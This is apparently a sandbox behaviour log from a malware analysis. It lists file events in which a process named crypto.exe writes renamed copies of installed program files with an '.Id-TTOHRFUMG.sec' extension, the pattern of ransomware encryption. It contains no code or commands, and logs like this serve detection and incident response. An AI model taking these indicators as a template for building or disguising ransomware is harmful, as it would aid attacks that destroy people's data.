File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR15F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsDoNotTrust.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libvc1_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18257_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\fontconfig.properties.src.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ko.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198226.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\cpu.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\DataServices\FOLDER.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN095.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04191_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01154_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Hardcover.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18180_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libskiptags_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\History.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00668_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01171_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\visualization\libvisual_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Moscow.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ASCIIENG.LNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OCRVC.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21300_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251925.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL111.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN081.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PPTIRMV.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\control\libgestures_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00170_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\OliveGreen.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_setid_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpCommu.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Zurich.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01295_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\NOTE.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\MSPVWCTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Atikokan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Winnipeg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00330_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\en-US\TableTextService.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01172_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01244_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_lv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00426_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18216_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02269_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libfaad_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00555_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\VVIEWDWG.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14711_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\uninstall\helper.exe.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01805_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21331_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ENGIDX.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DenyUninstall.rm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\MAPISHELLR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.PH.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00407_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14981_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_es_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00459_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmpnssci.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_200_percent.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSIDEBRV.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\WORDIRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\WinMail.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Microsoft.stdformat.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00423_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL078.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\msvcp140.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Apothecary.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\management\jmxremote.password.template.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01166_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IPEDITOR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107456.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WING2.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18221_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libamem_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\weather.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115834.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\en.ttt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\WindowsAccessBridge-64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OneNoteSyncPCIntl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02075_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OLTASK.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\timeZones.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nl.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_bn.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
